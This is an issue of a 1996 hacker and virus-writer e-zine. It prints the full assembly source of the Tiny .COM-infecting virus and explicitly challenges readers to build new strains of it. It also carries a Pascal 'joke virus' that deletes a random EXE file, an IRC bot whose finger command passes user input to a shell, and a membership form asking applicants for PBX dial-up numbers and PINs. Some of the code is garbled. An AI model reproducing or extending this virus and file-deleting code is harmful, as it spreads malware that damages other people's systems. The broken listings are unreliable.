The HAVOC Technicl Journal
Vol. 1 | No.5 | October 31st, 1996 | A HAVOC Bell Systems Publication
"Pleading the Fifth"
Happy Halloween!
Inside this issue:
Whats new this issue..............................
Editorial.........................................Scud-O
The Dumper........................................Scud-O
Virus Challenge...................................Scud-O / 40HEX
The Burrito Virus.................................Scud-O
BOT.C.............................................|\|\cFill
ANI Spoofing......................................Keystroke
Sign Up Sheet for HAVOC Bell Systems..............
X11 services......................................Scud-O
RTFM: The lamer Journal...........................
ROLL CALL & more!.................................
Next Month........................................
(I need more writers!!! e-mail me if ya want to write an article!
my e-mail is: FoxMulder@worldnet.att.net
the mags e-mail is: thtj@juno.com (wheee.. we get to read ads as
we get your e-mail!) )
This months music supplied by: Geggy Tah, TOOL, Korn
Sublime, Violent Femmes, Fun Loving Criminals and WHFS 99.1 !
What's new in this issue:
Back to the top
Well not much is new.. Yea Right! Both |\|\cFill and Keystroke
have joined HBS and they have both have articles in this issue.
Enjoy for they are great people!
How to contact us:
Check Out Our Web Site:
www.geocities.com/siliconvalley/8805/
my (Scud-O) e-mail is : FoxMulder@worldnet.att.net
Psycho's lame email: CLASSIFIED
|\|\cFill's email : CLASSIFIED
Keystroke's email : CLASSIFIED
(If you guys want your email unclassified tell me so! )
our Mag e-mail is : thtj@juno.com
HELLCORE's e-mail is : hellcore@juno.com
Editorial:
by Scud-O
Back to the top
Well HBS is really taking off again. After not seeing Pinky for a while and
Rotten & Sid's move I was worried that HBS would die. But |\|\cFill and
Keystroke (who are VERY cool people) have joined up! They each did an article
for this issue and next month we will have info sheets on them.
Also coming soon is a redesigned HBS web site! The graphics are
almost done, the 403 Forbideen club is being worked on, the members pages
will be created, and the links page will be up! Look for both Frames and non
frames pages and maybe some Java & JavaScript! I may be moving to L0pht soon
so then we will have CGI too!
In other news HBS is now into commercial & private Web Development!
So if you need any web stuff done cheaply we will do it! (we have super low
rates!) Check out our web page for more info up soon including the rates!
Now on to the bickering:
This has been a CRAZY month! new HBS memebers, me running my schools network,
coming in on weekends to work on it more! it TOO much! so that is why this
issue has been cut down in size and why next issue isn't coming out until the
15th of December! If you want to complain.. #$^%$@# you! It takes a HELL of a
LOT of work to run a web site, run a network, connect that network to inet,
and edit this magizine as well as write it up! so help by writting articles
for me!!!
----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-
FoxMulder@worldnet.att.net
the National Get A Gat! [tm] Program - Join it today!
"Beliefs are dangerous. Beliefs allow the mind to stop functioning.
A non-functioning mind is clinically dead. Believe in nothing"
-Tool "AEnima"
The Dumper:
by Scud-O
Back to the top
This is a HEX Dump utility I wrote which can really help you in virus writing
It is VERY simple but it works.. if you want more of a Dumper go find one..
they are out there.. ALSO: if you fix this Dumper send me a copy of the fix
and the source, I'll put it in a future issue! Below is the C source... its
about 8563 bytes the assembly version was only 1294 bytes but it was too much
typing to finish for this issue (ASM: 436 C:77 Winner:C!)
/* DUMP.C Display the binary contents of a file in
hex and ASCII on the standard output device.
Compile: C> CL DUMP.C or whatever your compiler is..
Usage: C>DUMP unit:path\filename.ext
Copyright (C) 1996 HAVOC Bell Systems ALL Rights F**ked!
Written by Scud-O of HBS
*/
#include
#include
#include
#define REC_SIZE 16 /* input file record size */
main (int argc, char *argv[])
{
int fd; /* input file handle */
int status = 0; /* status from file read */
long fileptr = OL; /* current file byte offset */
char filebuf[REC_SIZE]; /* data from file */
/* abort if missing filename */
if argc != 2)
{
fprintf(stderr, "\nDumper: wrong number of parameters\n");
exit(1);
}
/* open file in binary mode, abort if fails */
if((fd = open(argv[1],O_RDONLY | O_BINARY) ) == -1)
{
fprintf(stderr, "\nDumper: can't find file %s \n", argv[1]);
/* read and dump records until EOF */
while((status = read(rd,filebuf,REC_SIZE) ) != 0)
{
dump_rec(filebuf, fileptr, status);
fileptr += REC_SIZE;
}
close(fd); /* close the input file */
exit(0); /* return the success code */
}
/* Display record (16 bytes) in hex and ASCII on standard output */
dump_rec(char *filebuf, long fileptr, int length)
{
int i; /* index to current record */
if(fileptr % 128 == 0) /* display heading if needed */
printf("\n\n 0 1 2 3 4 5 6 7 8 9 A B C D E F");
printf("\n%041X ", fileptr); /* display file offset */
/* display hex equivalent of each byte from file */
for(i=0; i < length ; i++)
printf(" %02X", (unsigned char)filebuf[i]);
if(length != 16) /* spaces if partial record */
for(i=0; i<(16-length); i++)
printf(" ");
/* display ASCII equivalent of each byte from file */
printf(" ");
for(i=0;i 126)
putchar('.');
else putchar(filebuf[i]);
}
}
Virus Challenge:
by Scud-O / 40Hex
Back to the top
Okay people this article was originally in 40Hex Issue 1. This
is reprinted because It gives you a challenge to inprove this virus
so go a head and work on it! It will greatly help your virus writing
skills.
- VIRUS SPOTLIGHT -
The first virus I would like to spotlight is the Tiny virus, lets see
what our good friend Patti Hoffman (bitch) has written about it.
Name: Tiny
Aliases: 163 COM Virus, Tiny 163 Virus, Kennedy-163
V Status: Rare
Discovery: June, 1990
Symptoms: COMMAND.COM & .COM file growth
Origin: Denmark
Eff Length: 163 Bytes
Type Code: PNCK - Parasitic Non-Resident .COM Infector
Detection Method: ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Scan 2.00+
Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected
files
General Comments:
The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason
of Iceland in June 1990. This virus is a non-resident generic
.COM file infector, and it will infect COMMAND.COM.
The first time a file infected with the 163 COM Virus is executed,
the virus will attempt to infect the first .COM file in the
current directory. On bootable diskettes, this file will normally
be COMMAND.COM. After the first .COM file is infected,each time
an infected program is executed another .COM file will attempt to
be infected. Files are infected only if their original length is
greater than approximately 1K bytes.
Infected .COM files will increase in length by 163 bytes, and have
date/time stamps in the directory changed to the date/time the
infection occurred. Infected files will also always end with this
hex string: '2A2E434F4D00'.
This virus currently does nothing but replicate, and is the
smallest MS-DOS virus known as of its isolation date.
The Tiny Virus may or may not be related to the Tiny Family.
^like she'd know the difference!
OK, Theres the run down on the smallest MS-DOS virus known to man. As for
it being detected by SCAN we'll see about that.
Here is a dissasembly of the virus, It can be assembled under Turbo Assembler
or MASM.
PAGE 59,132
data_2e equ 1ABh ;start of virus
seg_a segment byte public ;
assume cs:seg_a, ds:seg_a ;assume cs, ds - code
org 100h ;orgin of all COM files
s proc far
start:
jmp loc_1 ;jump to virus
;this is a replacement for an infected file
db 0CDh, 20h, 7, 8, 9 ;int 20h
;pop es
loc_1:
call sub_1 ;
s endp
sub_1 proc near ;
pop si ;locate all virus code via
sub si,10Bh ;si, cause all offsets will
mov bp,data_1[si] ;change when virus infects
add bp,103h ;a COM file
lea dx,[si+1A2h] ;offset of '*.COM',0 - via SI
xor cx,cx ;clear cx - find only normal
;attributes
mov ah,4Eh ;find first file
loc_2:
int 21h ;
jc loc_6 ;no files found? then quit
mov dx,9Eh ;offset of filename found
mov ax,3D02h ;open file for read/write access
int 21h ;
mov bx,ax ;save handle into bx
mov ah,3Fh ;read from file
lea dx,[si+1A8h] ;offset of save buffer
mov di,dx ;
mov cx,3 ;read three bytes
int 21h ;
cmp byte ptr [di],0E9h ;compare buffer to virus id
;string
je loc_4 ;
loc_3:
mov ah,4Fh ;find the next file
jmp short loc_2 ;and test it
loc_4:
mov dx,[di+1] ;lsh of offset
mov data_1[si],dx ;
xor cx,cx ;msh of offset
mov ax,4200h ;set the file pointer
int 21h ;
mov dx,di ;buffer to save read
mov cx,2 ;read two bytes
mov ah,3Fh ;read from file
int 21h ;
cmp word ptr [di],807h ;compare buffer to virus id
je loc_3 ;same? then find another file
;heres where we infect a file
xor dx,dx ;set file pointer
xor cx,cx ;ditto
mov ax,4202h ;set file pointer
int 21h ;
cmp dx,0 ;returns msh
jne loc_3 ;not the same? find another file
cmp ah,0FEh ;lsh = 254???
jae loc_3 ;if more or equal find another file
mov ds:data_2e[si],ax ;point to data
mov ah,40h ;write to file
lea dx,[si+105h] ;segment:offset of write buffer
mov cx,0A3h ;write 163 bytes
int 21h ;
jc loc_5 ;error? then quit
mov ax,4200h ;set file pointer
xor cx,cx ;to the top of the file
mov dx,1 ;
int 21h ;
mov ah,40h ;write to file
lea dx,[si+1ABh] ;offset of jump to virus code
mov cx,2 ;two bytes
int 21h ;
;now close the file
loc_5:
mov ah,3Eh ;close file
int 21h ;
loc_6:
jmp bp ;jump to original file
data_1 dw 0 ;
db '*.COM',0 ;wild card search string
sub_1 endp
seg_a ends
end start
Its good to start off with a simple example like this. As you can see
what the virus does is use the DOS 4Eh function to find the firsy COM file
in the directory. If no files are found the program exits. If a file is
found it compares the virus id string (the virus jump instruction) to the
first two bytes of the COM file. If they match the program terminates.
If they don't match the virus will infect the file. Using two key MS-DOS
functions to infect.
The first -
INT 21h Function 42h
SET FILE POINTER
AH = 42h
AL = method code
BX = file handle
CX = most significant half to offset
DX = least " "
If there is an error in executing this function the carry flag will be set,
and AX will contian the error code. If no error is encountered
DX = most significant half of file pointer
AX = least " "
The second (and most) important function used by any virus is
INT 21h Function 40h
WRITE TO FILE OR DEVICE
AH = 40h
BX = handle
CX = number of bytes to write
DS:DX = segment of buffer
Returns
AX = bytes transferred
on error
AX = Error Code and flag is set.
An example of Function 40h is ----
mov ah,40h ;set function
mov bx,handle ;load bx with handle from prev open
mov cx,virus_size ;load cx with # of bytes to write
mov dx,offset write_buffer ;load dx with the offset of what to
;write to file
int 21h ;
This function is used by 98% of all MS-DOS viruses to copy itself to a
victim file.
Now heres a sample project - create a new strain of Tiny, have it restore
the original date and time etc...
HR
The Burrito Virus:
by Scud-O
Back to the top
This is a joke virus just like the Cookie virus. It says that it
wants a burrito, if you type 'burrito' it exits. Type 'breakfast burrito'
and the virus deletes itself. type 'taco bell burrito' and the virus kills
a random file (EXE). Actually this virus isn't really a true virus, as it
doesnt spread (hmm.. maybe for version 2... ) anyway I wrote this is PASCAL
basically because I was bored in PASCAL class. I'm going to port this to ASM
as soon as i find the time... (hey im a busy guy alright?!?!) currently this
file is like 4000 or so bytes (give or take..)
PLEASE NOTE: This is a VERY early version of the virus! The final is lost
somewhere on my network at school... I will hopefully find it for next issue!
Challenge: get this porgram to work fully! I will give a prize to whoever
fixes it first!
PROGRAM burrito (Input,Output,InfectedFile);
USES dos;
(*CONST
ThisFile = 'win.com';*)
VAR
regs: Registers;
DirInfo: SearchRec;
InfectedFile : Text;
KillFile,
ThisFile,
UsrInput : String;
BEGIN
ThisFile := 'win.com' ;
Write('I want a burrito! ');
ReadLn(UsrInput);
If UsrInput = 'burrito'
Then
Begin
End ;
If UsrInput = 'breakfast burrito'
Then
Begin
WriteLn('Yuck');
regs.ah := $41;
with regs do
msdos(regs);
with regs do
begin
str(dx, ThisFile);
end;
End;
If UsrInput = 'taco bell burrito'
Then
Begin
KillFile := FindFirst('*.EXE', Archive, DirInfo);
begin
regs.ah := $41;
with regs do
msdos(regs);
with regs do
begin
str(dx , KillFile);
end;
end;
End;
end.
A simple C bot by |\|\cFill:
Back to the top
/*
* bot.c - example of IRC automaton
*
* invoke with "irc -e bot"
*
* TnG - //\/\cFiLL
* repo
*/
#include
#include
#include "varargs.h"
#define LOGFILE "bot.log"
#define MAXLEN 270
#define MAXARGS 135
#define PUBLIC 0x01
#define PRIVATE 0x02
#define NOTICE 0x04
#define DCCCHAT 0x08
char *strchr(char *str, int ch);
void init(void);
void strip(char *str);
int makeargs(char *str, char **av);
void parse(int ac, char **av);
void say();
int
main()
{
FILE *log;
char *buf, **av;
int ac;
buf = (char *) malloc(sizeof(char) * MAXLEN);
av = (char **) malloc(sizeof(char **) * MAXARGS);
if(!(log = fopen(LOGFILE, "a"))) {
perror(LOGFILE);
exit(1);
}
while(fgets(buf, MAXLEN, stdin)) {
strip(buf);
fprintf(log, "%s\n", buf);
fflush(log);
ac = makeargs(buf, av);
parse(ac, av);
fflush(stdout);
}
fclose(log);
free(av);
free(buf);
exit(0);
}
void init(void)
{
puts("/join #home");
puts("/notify SigInt");
}
void
strip(char *str)
{
char *t;
if(t = strchr(str, '\n')) *t = 0;
if(t = strchr(str, '\r')) *t = 0;
if(t = strchr(str, '\\')) *t = 0;
if(t = strchr(str, ';')) *t = 0;
}
int
makeargs(char *str, char **av)
{
char *t = str;
int ac = 0;
while(*t) {
if(ac < MAXARGS) av[ac++] = t;
while(*t && *t != ' ') t++;
if(*t) *t++ = 0;
while(*t && *t == ' ') t++;
}
return(ac);
}
void pargs(int ac, char **av)
{
int i;
for(i = 0; i < ac; i++)
printf("%s ", av[i]);
printf("\n");
}
void say(va_alist) va_dcl
{
va_list args;
char *from, *fmt;
int flags;
va_start(args);
flags = va_arg(args, int);
from = va_arg(args, char *);
fmt = va_arg(args, char *);
/* parse flags */
if(flags & PUBLIC)
vprintf(fmt, args);
if(flags & PRIVATE) {
printf("/msg %s ", from);
vprintf(fmt, args);
}
if(flags & NOTICE) {
printf("/notice %s ", from);
vprintf(fmt, args);
}
if(flags & DCCCHAT) {
printf("/msg =%s ", from);
vprintf(fmt, args);
}
va_end(args);
}
void parse(int ac, char **av)
{
#define public() flags = PUBLIC
#define private() flags = PRIVATE
#define notice() flags = NOTICE
#define dccchat() flags = DCCCHAT
#define match(x,y) (!strcmp((x),(y)))
static char nick[9], from[9], master[9], chnl[11];
char *first, *last, *cmd, *second;
int client = 0, trusted = 0, flags = PUBLIC;
strcpy(nick, "SigBot");
/* determine type of input */
first = av[0];
second = av[2];
last = first + strlen(first) - 1;
cmd = av[1];
/* set flags based on input */
if(*first == '<' && *last == '>') public();
else if(*first == '*' && av[0][1] != '*' && *last == '*') private();
else if(*first == '-' && *last == '-') notice();
else if(*first == '=' && *last == '=') dccchat();
else client++;
*last = 0;
strncpy(from, first + 1, 8);
if(match(from, "SigInt")) trusted++;
/* begin parsing bot's input */
if(client) {
if(match(av[4], "channels.")) {
strcpy(chnl, "#home");
init();
}
else if(match(av[1], "You") && match(av[4], "kicked")) {
printf("/join %s\n", chnl);
sleep(1);
printf("%s, you bastard!!!\n", av[9]);
}
else if(match(cmd, "DCC") && match(av[2], "CHAT"))
printf("/dcc chat %s\n", av[7]);
else if(match(cmd, "DCC") && match(av[2], "SEND")) {
private();
say(flags, av[7], "Sorry, %s, I don't do DCC :(\n", av[7]);
}
else if(match(av[2], "invites")) {
strcpy(chnl, av[6]);
printf("/join %s\n", chnl);
printf("/msg %s thanks!\n", av[1]);
}
else if(match(av[3], "joined") && strcmp(av[1], nick)) {
if(match(av[1], "SigInt"))
printf("/mode %s +o SigInt\n", chnl);
}
else if(match(av[1], "Signon")) {
strcpy(from, av[3]);
private();
say(flags, from, "hi %s!\n", av[3]);
printf("/msg SigInt %s is here!\n", av[3]);
}
else if(match(cmd, "Signoff"))
printf("/msg SigInt %s has left!\n", av[3]);
return;
}
/* parse public, private, notice, and dccchat messages */
if(match(cmd, "die") && trusted) puts("/sign Bad breath?");
else if(match(cmd, "do") && trusted) pargs(ac - 2, av + 2);
else if(match(cmd, "finger")) printf("/exec -out finger %s\n", av[2]);
else if(match(cmd, "go") && trusted) {
strcpy(chnl, av[2]);
printf("/join %s\n", chnl);
}
else if(match(cmd, "nick") && trusted) printf("/nick %s\n", av[2]);
else if(match(cmd, "op") && trusted) printf("/mode %s +o %s\n", chnl, av[2]);
else if(match(cmd, "ping")) say(flags, from, "pong.\n");
else if(match(cmd, "sextalk")) printf("/exec -out SexTalk\n");
else if(!strcasecmp(cmd, "What"))
printf("I don't know, that's a good question %s\n", from);
else if(!strcasecmp(cmd, "Why"))
printf("yeah, why?\n");
else if(!strcasecmp(cmd, "How"))
printf("%s, doing so is pretty impossible, unless you're a bot!\n", from);
else if(!strcasecmp(cmd, "elite"))
printf("very elite\n");
else if(!strcasecmp(cmd, "re"))
printf("re %s\n", second);
}
ANI Spoofing by Keystroke
Back to the top
(this was first published in PLA issue 41. (thats why he's the mad little
PLA (Phone Losers of America) Insider!!))
Dear PLA:
I've found a new way to block 800 ANI. It is called Net2Phone and allows
people to place calls using a piece software which connects to IDT's (the
company offering Net2Phone) servers and routes the call from their fones in
New Jersey to wherever you want to call.
Here is how they describe it, "Net2Phone enables Internet users with sound
equipped PCs to initiate calls from their computers and transmit them over the
Internet to IDT's phone switches. The switches then convert the signal from
the 'packet switch network' Internet environment to the 'circuit switch
network' telephone environment. And then to its' final destination - any
ordinary telephone. The result is real-time uninterrupted voice communication
between the two calling parties."
This service is offered for free on 800 and 888 numbers. If you want to call
regular numbers it cost's extra. Unfortunately, after you call the number, you
cannot send tones and it is too staticky to use a tone dialer. Grab a copy at
http://www.net2phone.com.
Keystroke - prenzo@soho.ios.com
The HAVOC Bell Systems Sign Up sheet:
Back to the top
(NOTE: im not real sure why im doing this, Its usually
invite only , but i dunno, sign this and
maybe you can get in... )
Application For Membership To HAVOC Bell Systems
HAVOC Bell Systems is quickly coming on to the net and irc.
(we'd be on HellNet[tm] if Scud-O EVER gets his own line!!)
We are a serious group of Phreakers/Hackers/ and Virus Writers.
We are all over the globe so.. a group meeting is pretty unlikely.
If you wish to apply for membership to HBS or if you want
your board to become to become a HBS distribution site
fill out the application below and upload to Scud-O at:
FoxMulder@worldnet.att.net
for the Subject put: HAVOC Bell Systems Sign Up Sheet
(anything else will not be reviewed!)
Keep in mind, from the start of HAVOC Bell Systems we have been
mainly Phreakers, but we are now into hacking and viruses.
We do this to fight for phreaker's rights and to fight the
Ma Bell beast.
------------------------------------------------------------------------------
Application For Membership
I am interested in becoming
___ A HAVOC Bell Systems (HBS) Member
___ An HBS Distribution Site Sysop
Handle: ________________
Aliases: ________________
Email : ________________
Are you in any other groups? List them
_____________________________________
_____________________________________
_____________________________________
What are you into? (Hacking/Phreaking/Virus/Etc.. )
________________________________________________________________
What do you know?
________________________________________________________________
________________________________________________________________
________________________________________________________________
________________________________________________________________
Do you know any programming languages? (C/PASCAL/ASM)
____________________________ (Know well)
____________________________ ...
____________________________ (Just messed with)
Are you a sysop of a BBS? ___
If yes leave the vitals:
BBS Name: _________________________
Dialup: _________________________
State/Country: ____________________
Running: example: PCBoard _________
Do you have a web site? ___
vitals:
Address: _________________________________________________
CGI access : ______ (Y or N)
Storage space: __________MB
List three people you know (handles) : _________________
_________________
_________________
List what IRC channels you are on:
Channel: ____________________
Server:______________________ (ex. Undernet, Dalnet, etc)
Do you have ops on this channel? ___ (Y/N)
List a BBS that you have 'elite' access to:
Name: _____________________ Dialup: _______________________
Sysop: ____________________ NUP: __________________________
Do you have a VMB:
Dialup: _________________ Box#: _________
Quiz:
1. What is a PBX? __________________________________________
2. What is a PBX dial up # :________________________________
PIN :________________________________
3. What is a Bot? __________________________________________
Are you in any way connected to and law enforcment agency? ___
(NOTE: by law you MUST answer this truthfully! )
Do you realize that being untruthfull to the above question
waviers all legal matters: ____
Are you in anyway connected to any software company? ___
Thank for filling this out. -The HAVOC Bell Systems gang-
Please email this application to Scud-O at: FoxMulder@worldnet.att.net
for the Subject put: HAVOC Bell Systems Sign Up Sheet
(anything else will not be reviewed!)
X11 Services: by Scud-O
Back to the top
011 : Used for international dialing
111 : No use
211 : No Use
311 : Disconnect phone temporally ( In Baltimore it is for non
emergency Five-O service )
411 : Information ( So whats the 411? )
511 : No Use
611 : Repairs
711 : No Use
811 : No Use
911 : Emergency ( Rescue911 )
NOTE: This was tested in the Baltimore Metro area, so other places this may be different!
RTFM: The Lamer Journal
Back to the top
What is RTFM : The Lamer Journal?
basically it is a monthly article teaching basics of stuff, which
will continue until we feel we have covered what you need to know.
Next month will have a basics on the smarts you need to stay out
in the world long enough to practice your hobby.
Each monthly installment has info and a quiz on the material, and
info on where to get more info, practice sites, tools, etc.
Look for it starting with issue 6!
ROLL CALL & More!
Back to the top
Who is HAVOC Bell Systems?
Scud-O : Bunghole
Psycho : Burrito
|\|\cFill : Bot boy
Keystroke : PLA Insider
Pinky : In hidding
Rotten : Moving fool
Sid : Other Moving Fool (and the're twins as well! )
Want to join? check out the sign up sheet!
Cool People:
phire
UnaBomber
theLURK7R (sometimes theLURK3R ) or 4, 2 , etc...
LogicBox
Dem0nWeed
darkcyde
Rap3d_C0w
all on IRC!
This Month Question: Who is Scud-O?
Scud-O is from the cool as shit comic book Scud: The Dispossible
Assassin by Rab Schrab and Fireman Press. In issue 2 there is a
TV ad for the Scud line and there is a little gun that talks and
his name is Scud-O. There was a cool theme song it was:
"Get your spite in a bag,
get your bile piled up,
its the best damn vengance you've ever had!"
Next Month's Question: Who are |\|\cFill and Keystroke?
Next Month:
Back to the top
This MAY be what we will have in issue 6
- The HellNet[tm] script / C code!
- Voice Mail Boxes
- PBX's
- Pager Talk (Delayed from this issue)
- NIDs pt.2 (Delayed from this issue)
- Whats up in the HELLCORE labs? (Delayed from this issue)
- Undernet Crash (Delayed from this issue)
- More from the RTFM: The Lamer Journal
- Much, Much more TBA!
Issue 6 is out Dec. 15th!
cya ya next issue! - The HAVOC Technical Journal Crew